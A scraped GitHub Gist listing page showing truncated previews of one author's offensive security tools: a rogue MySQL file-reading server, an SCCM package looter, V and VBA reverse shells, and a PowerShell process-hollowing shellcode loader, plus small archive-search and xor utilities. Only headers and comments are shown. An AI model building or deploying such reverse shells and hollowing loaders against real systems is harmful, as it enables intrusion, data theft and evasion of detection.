Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/env python3
# Modernized version of https://github.com/Gifts/Rogue-MySql-Server that works without further dependencies.
# However, this technique does no longer work by default in most MySQL clients. The ability of the server
# to request local files from the client is usually restricted nowadays and needs to be unlocked using specific
# parameters in the client config or the connection string. The following lines show a an example how to emulate
# a vulnerable PHP based MySQL client:
#
# php > $db = new PDO('mysql:host=127.0.0.1;dbname=test', 'root', 'root', array(PDO::MYSQL_ATTR_LOCAL_INFILE => true));
# php > $db->query('SELECT user()');
@qtc-de
qtc-de / sccm-http.py
Created December 9, 2024 19:31
This script contains a python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter)
#!/usr/bin/env python3
# This script contains a python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter)
# The following additional packages may need to be installed depending on the usage:
#
# pip install requests-ntlm (required for authenticated access to SCCM DPs)
# pip install requests[socks] (required for usage over socks proxy)
#
# The script attempts to obtain a package list via HTTP directory listing. However, when dealing
# with large package lists, this is not 100% reliable as the server may cut the amount of entries
@qtc-de
qtc-de / Get-ProcessRedirectionTrustPolicy.cpp
Created October 20, 2022 11:56
Enumerate the ProcessRedirectionTrustPolicy for each running process and print the result.
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <winnt.h>
#include <winternl.h>
typedef NTSTATUS(*MyNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
int main(int argc, char** argv)
@qtc-de
qtc-de / windows-reverse-shell.v
Created August 16, 2022 19:39
Simple Windows reverse shell based on V. Just an experiment. For educational purposes only!
#flag -lws2_32
#include "winsock2.h"
struct WSADATA {
mut:
w_version u16
w_high_version u16
i_max_sockets u16
i_max_udp_dg u16
lp_vendor_info &string = 0
@qtc-de
qtc-de / findfile.sh
Created May 4, 2022 05:59
Find filenames within of zip or jar archives
#!/bin/bash
function usage()
{
NAME=$(basename $0)
echo "Usage: $NAME [filter] [path]"
echo ""
echo "Arguments:"
echo " filter regex filter that is applied to archive contents"
@qtc-de
qtc-de / findstring.sh
Created May 4, 2022 05:58
Search for strings within of zip or jar archives
#!/bin/bash
if ! command -v ugrep &> /dev/null;
then
echo "[-] Error: ugrep is not available, but required for this script."
exit 1
fi
function usage()
{
@qtc-de
qtc-de / xor.py
Last active July 18, 2023 10:18
XOR All The Things! Python script that searches for byte representations within the specified file or input and xors them with the specified key.
#!/usr/bin/env python3
import re
import sys
import argparse
class Xor:
'''
Helper class for performing xor operations.
@qtc-de
qtc-de / swaperoo.py
Last active March 19, 2022 06:31
Swap the case of each ASCII letter within a string and print each possible combination to stdout.
#!/usr/bin/env python3
import string
import argparse
import itertools
from typing import Iterator
def swaperoo(target: str) -> Iterator[str]:
'''
@qtc-de
qtc-de / Win32-ReverseShell.vb
Last active May 25, 2023 13:49
VBA reverse shell that uses Win32 API calls
' ********************************************************************************************************
'
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources:
'
' * https://stackoverflow.com/questions/8670391
' * https://stackoverflow.com/questions/43197814
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/
'
' The code demonstrates more complex usage example for calling Win32 API from VBA and should be used
' for educational purpose only. During development I was mainly interested whether the WSAData or the
@qtc-de
qtc-de / DynWin32-ShellcodeProcessHollowing.ps1
Created January 29, 2022 15:17
PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.